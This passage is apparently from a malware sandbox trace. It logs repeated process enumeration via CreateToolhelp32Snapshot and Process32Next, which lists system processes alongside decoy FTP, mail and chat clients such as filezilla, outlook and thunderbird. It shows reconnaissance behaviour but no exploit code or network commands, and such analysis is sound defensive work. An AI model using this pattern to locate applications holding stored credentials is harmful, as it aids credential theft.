lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0235.364] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0235.366] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0235.368] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0235.373] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0235.376] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0235.378] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0235.380] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0235.382] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0235.384] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0235.386] CloseHandle (hObject=0x222c) returned 1 [0235.386] Sleep (dwMilliseconds=0x64) [0235.515] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x227c [0235.537] Process32First (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.541] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0235.545] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0235.547] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.550] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0235.552] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.555] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0235.594] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0235.597] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0235.599] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.601] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.603] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0235.605] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.607] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.610] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.612] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.613] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.687] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.690] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.693] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0235.696] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0235.698] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.701] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0235.745] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.748] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0235.751] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0235.754] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0235.757] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0235.759] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0235.761] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0235.764] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.766] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.769] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0235.771] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.773] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.776] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0235.784] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0235.787] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0235.789] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0235.792] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0235.794] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0235.797] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0235.800] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0235.802] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0235.805] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0235.807] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0235.810] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0235.814] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0235.817] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0235.823] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0235.828] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0235.831] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0235.834] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0235.837] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0235.839] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0235.842] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0235.845] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0235.848] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0235.852] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0235.855] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0235.859] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0235.866] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0235.869] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0235.872] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0235.875] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0235.879] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0235.882] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0235.885] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0235.888] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0235.891] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0235.893] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0235.897] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0235.900] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0235.906] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0235.909] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, 